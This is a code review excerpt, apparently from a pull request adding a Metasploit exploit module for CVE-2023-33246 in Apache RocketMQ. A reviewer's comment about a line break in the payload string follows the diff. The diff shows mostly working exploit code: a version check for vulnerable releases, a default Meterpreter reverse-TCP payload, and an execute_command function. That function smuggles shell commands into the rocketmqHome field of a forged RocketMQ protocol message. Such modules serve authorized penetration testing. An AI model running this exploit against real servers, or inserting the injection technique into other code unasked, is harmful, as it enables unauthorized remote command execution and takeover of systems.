modules/exploits/multi/http/apache_rocketmq_update_config.rb

```diff
@@ -0,0 +1,121 @@
+          leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using
+          the update configuration function to execute commands as the system users that RocketMQ is running as.
+          Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.
+        },
+        'Author' => [
+          'Malayke', # PoC
+          'jheysel-r7',  # module - RCE portion
+          'h00die',      # module - Version detection & parsing
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT#usage-examples'],
+          [ 'CVE', '2023-33246']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :nix_memory
+            }
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),
+        OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])
+      ]
+    )
+  end
+
+  def check
+    @version_request_response = send_version_request
+    @parsed_data = parse_rocketmq_data(@version_request_response)
+    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']
+
+    version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version
+
+    if version > Rex::Version.new('5.0.0')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
+    elsif version <= Rex::Version.new('4.9.5')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
+    end
+    Exploit::CheckCode::Safe("RocketMQ version: #{version}")
+  end
+
+  def execute_command(cmd, opts = {})
+    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
+rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
```

Comment:
I'm not sure if it is intended, but this string is split across two lines. Not a big deal, but his will introduce a carriage return `\n` in the final payload.